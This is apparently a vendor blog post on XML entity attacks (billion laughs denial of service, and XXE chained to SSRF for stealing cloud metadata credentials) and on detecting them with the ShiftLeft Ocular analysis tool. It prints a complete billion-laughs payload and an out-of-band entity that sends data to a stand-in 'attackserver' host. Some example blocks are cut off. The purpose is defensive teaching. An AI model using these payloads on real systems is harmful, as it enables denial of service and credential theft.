Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular

A significant number of enterprises use XML as a data exchange format. XML is the de-facto standard for exchanging messages between enterprise applications in a Services Oriented Architecture. Messages that conform to the canonical model are converted back and forth to XML.

If you have ever worked in an enterprise context you know that life there isn’t simple and neither is the type you of data and its relationships you come across. This is an environment where XML shines as a data format with an extensible schema to represent complex business processes in the real world.

Many industry standards have evolved over the years that are based on XML. Years of work and expertise have gone into these standards. In particular, this is the case in finance (ESMA TRACE, MIFID, XBRL), retail, healthcare (HL7), life sciences (CDISC), and public sector (EU) just to name a few. In the publishing industry, XML is used throughout the document processing workflow. It is also the standard for Office file formats such as Word, Excel, PowerPoint or the Google Docs equivalents.

XIE (XML Internal Entity) Attack — LOL! based Denial Of Service

<!DOCTYPE biz [    
<!ENTITY dry "Don't Repeat Yourself" > <!-- definition -->
]><text>&dry;</text> <!-- usage -->

All we need to do is to write the doctype declaration and define the custom entity in it. After that, we can use our new internal entity in an XML document. As a result, the parser will replace every &dry; occurrence with ‘Don’t Repeat Yourself’ text. Unfortunately, this feature puts us in danger.

Let’s look at the very simple, yet dangerous denial of service (DoS) attack called the Billion laughs attack.

In order to carry out the attack, you need to prepare malicious XML using internal entities and use it as an input.

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
<!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
<!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
<!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
<!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
<!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
<!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
<!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">

When an XML parser loads this document, it will try to resolve the loli entity. At first, loli expands to ten lolh entities, each lolg expands to ten lolf entities and so on. As a result, we get 1 billion “lol” strings.

This imposes a huge burden on the hosting compute resources, which can severely impede application responsiveness! (exponential memory consumption of xGB per minute leading to kernel panic)

XXE (XML External Entity) Attack chained to SSRF (Server Side Request Forgery)— Metadata exfiltration

<!DOCTYPE xxe [       
<!ENTITY externalEntity SYSTEM “ADD URI HERE”>

Let’s use an example to illustrate this. Imagine that we have two endpoints:

1. One for listing all posts and other
2. For creating new posts.

With this in mind, we can prepare malicious XML input and use the endpoint to create a new post. The input data could look like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY externalEntity SYSTEM

In a subsequent iteration, we can use another endpoint to list all posts. If the attack succeeds, the response will look like this:


By concatenating the role (received in response to prior iteration) the attacker will be able to retrieve access, secret, and session token keys of hosting cloud provider.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY externalEntity SYSTEM

If the attack succeeds, the response will look like this:

"Code" : "Success",
"LastUpdated" : "2018-01-25T23:15:40Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKJBD787XXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXX",
"Token" : "ZXXXXXXXXXX",
"Expiration" : "2018-01-26T05:40:31Z"

As you can see, this is really dangerous and can lead to serious security problems!

What if there is only an API to create and not list information? This would impede an attacker from receiving feedback or a response reflectively.

You might think you are safe, but that’s not true. Instead of providing the file with external entity definition, the attacker can register an endpoint that listens to every request and logs results.

<!ENTITY % paramEntityDefiningExternalEntity '<!ENTITY sniffTraffic SYSTEM "http://attackserver/sniff_log?%result;">'><!DOCTYPE xxe [
<!ENTITY % paramEntity SYSTEM "URI to file with parameter entity definitions" >
] ><post author="consumer" topic="XXE" content="&sniffTraffic;" />

Safe Coding to prevent XXE Chaining

The precaution measures takes into account different version of JDK runtime by setting appropriate features that can collectively prevent an XXE/XIE attack across disparate versions and runtimes.

Can these safe coding checks be verified using Ocular ?

  1. Identify untrusted attacker-controlled vector content , in this case
  2. Mark DocumentBuilderFactory.newInstance() as a source in the data flow
  3. Mark builder.parse(new ByteArrayInputStream(content.getBytes())) as sink
  4. Conduct reachability analysis between source and sink that is influenced by attacker-controlled vector
  5. Conduct verification by using Ocular’s passes construct to ensure that all safety features are enabled (as prescribed above) in the data flow before attacker-controlled vector touches the sensitive sink originating at the source.

ShiftLeft’s Ocular is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws and insider attacks that might exist in your application’s codebase.

The following POC codebase is evaluated for this seeded condition.

Specified below is a detailed investigation log to detect XXE chaining to DOS (LOL based) or SSRF. Criteria for validation can also be evaluated to ensure that the conclusion is a true positive.

If you’d like to learn more about ShiftLeft’s Code Property Graph, and Ocular and how it can be used to help identify XXE+SSRF or XXE+DOS, please request a demo.

Happy Hunting and Hacking !

Engineer, InfoSec tinkerer, Seed Investor, Founder/CTO of ShiftLeft Inc., (Opinions, my own)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store